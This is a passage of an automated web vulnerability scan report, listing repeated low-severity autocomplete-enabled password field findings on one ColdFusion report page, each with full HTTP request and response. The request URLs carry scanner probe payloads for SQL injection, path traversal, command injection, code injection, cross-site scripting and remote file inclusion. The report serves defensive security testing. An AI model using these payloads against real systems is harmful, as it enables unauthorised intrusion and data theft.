<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.243. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../windows/iis6.log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.244. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.245. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=SELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=SELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:09 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=SELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.246. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;//

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.247. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%3cscript%3ens(0x000024)%3c/script%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=%3Cscript%3Ens(0x000024)%3C/script%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:46 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%3cscript%3ens(0x000024)%3c/script%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.248. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=NSFTW

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=NSFTW HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=NSFTW" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.249. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1%20ns=netsparker(0x000026)%20

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1%20ns=netsparker(0x000026)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1%20ns=netsparker(0x000026)%20" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.250. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%26%20SET%20%2FA+0xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.251. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111))%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.252. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x00002F)%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x00002F)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x00002F)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.253. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%3c%25+response.write(268409241-22)+%25%3e" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.254. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://netsparker.com/n?

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=http://netsparker.com/n? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n?" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.255. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%26ping%20-c%2026%20127.0.0.1%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.256. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%2BNSFTW%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='%2BNSFTW%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

17.257. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1+OR+X%3d'ss

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1+OR+X%3d'ss HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1+OR+X%3d'ss" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.258. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.259. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e3042a9b6d0213f1e43
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:08 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.260. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%2Bresponse.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
